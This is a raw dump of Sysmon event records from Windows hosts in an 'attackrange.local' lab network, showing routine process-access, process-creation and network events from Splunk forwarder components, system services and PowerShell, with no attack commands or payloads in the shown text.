07:57:25.666{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808485Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.666{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808484Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:25.666{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808483Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.666{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F5E5-60EB-9879-00000000D001}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808482Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.666{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5E5-60EB-9879-00000000D001}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808481Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.651{0C1E0330-F5E5-60EB-9879-00000000D001}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808480Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.525{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=20F4A289F7A03AB2C175CFAB0E45A068,SHA256=699B955CDA56F81CE458B732270FC2495E9054A8706C8247B018B42E24BFF71B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808479Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.525{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=99FB400CD1BC03EDDD44992DF72704C8,SHA256=872BB68EE2B8A2CB010F76C2A352848F926DE0A218D847A2B4613992C8B5BF71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808478Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.259{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6AE320F8807EFC415A896DAAA33AA7A,SHA256=46BB1DFAB2829EA280CE4FD7F2D33F5F295FE3CF1FA8A873E8C9188DC2018E98,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808477Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:23.754{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse65.49.20.68scan-19.shadowserver.org36662-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 10341000x8000000000000000808476Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.009{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5E4-60EB-9779-00000000D001}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808475Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:25.009{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808474Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.009{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808473Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:25.009{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808472Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.009{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808471Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:25.009{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808470Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.009{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808469Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:25.009{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808468Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.994{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808467Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:24.994{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808466Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.994{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F5E4-60EB-9779-00000000D001}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808465Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.994{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5E4-60EB-9779-00000000D001}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808464Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.994{0C1E0330-F5E4-60EB-9779-00000000D001}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001051081Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:26.966{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051080Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.951{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051079Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:26.935{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051078Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.888{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051077Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:26.888{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051076Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.888{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051075Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
